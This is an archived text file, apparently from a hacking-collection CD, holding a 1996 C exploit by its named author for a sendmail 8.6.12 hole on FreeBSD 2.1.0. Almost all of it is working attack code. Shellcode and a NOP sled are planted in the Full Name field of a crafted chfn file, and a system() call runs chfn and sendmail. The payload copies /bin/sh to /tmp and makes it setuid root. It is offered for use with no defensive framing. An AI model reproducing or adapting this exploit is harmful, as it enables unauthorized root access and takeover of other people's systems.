home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / FreeBSDmail.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  2.8 KB  |  80 lines
  1.  
  2.         Exploit for sendmail security hole (version 8.6.12 for FreeBSD
  3.                                        
  4.    Alexey Zakharov (leshka@chci.chuvashia.su)
  5.    Mon, 23 Sep 1996 10:56:39 -0400
  6.    
  7. /*                               Hi !                                       */
  8. /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
  9. /* If you have any problems with it, send letter to me.                     */
  10. /*                             Have fun !                                   */
  11.  
  12.  
  13. /* -----------------   Dedicated to my beautiful lady   ------------------  */
  14. /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */
  15.  
  16. #include <stdio.h>
  17. main()
  18. {
  19. void make_files();
  20.      make_files();
  21.      system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
  22. echo See result in /tmp");
  23. }
  24.  
  25. void make_files()
  26.  {
  27.   int i,j;
  28.   FILE *f;
  29.   char nop_string[200];
  30.   char code_string[]=
  31.                       {
  32.                          "\xeb\x50"                         /* jmp    cont */
  33.  
  34. /* geteip: */            "\x5d"                             /* popl   %ebp */
  35.                          "\x55"                             /* pushl  %ebp */
  36.                          "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc
  37. 3(%ebp) */
  38.                          "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd
  39. 7(%ebp) */
  40.                          "\xc3"                             /* ret */
  41.  
  42. /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
  43. /* 0xffffffc3(%ebp): */ "\x3c"
  44.                         "chmod a=rsx /tmp/sh"
  45. /* 0xffffffd7(%ebp): */ "\x01"
  46.                         "-leshka-leshka-leshka-leshka-"    /* reserved */
  47.  
  48. /* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf7
  49. 0,%esp */
  50.                         "\xe8\xa5\xff\xff\xff"             /* call   geteip */
  51.                         "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4fffff
  52. f,%ebp */
  53.                         "\x55"                             /* pushl  %ebp */
  54.                         "\x55"                             /* pushl  %ebp */
  55.                         "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0
  56.   */
  57.                         "\xc3"                             /* ret */
  58.                         "-leshka-leshka-leshka-leshka-"    /* reserved */
  59.                         "\xa0\xcf\xbf\xef"
  60.                      };
  61.  
  62.   j=269-sizeof(code_string);
  63.   for(i=0;i<j;nop_string[i++]='\x90');
  64.   nop_string[j]='\0';
  65.  
  66.   f=fopen("user.inf","w");
  67.   fprintf(f,"#Changing user database information for leshka\n");
  68.   fprintf(f,"Shell: /usr/local/bin/bash\n");
  69.   fprintf(f,"Location: \n");
  70.   fprintf(f,"Office Phone: \n");
  71.   fprintf(f,"Home Phone: \n");
  72.   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
  73.   fclose(f);
  74.  
  75.   f=fopen("hack","w");
  76.   fprintf(f,"cat user.inf>\"$1\"\n");
  77.   fprintf(f,"touch -t 2510711313 \"$1\"\n");
  78.   fclose(f);
  79.  }
  80.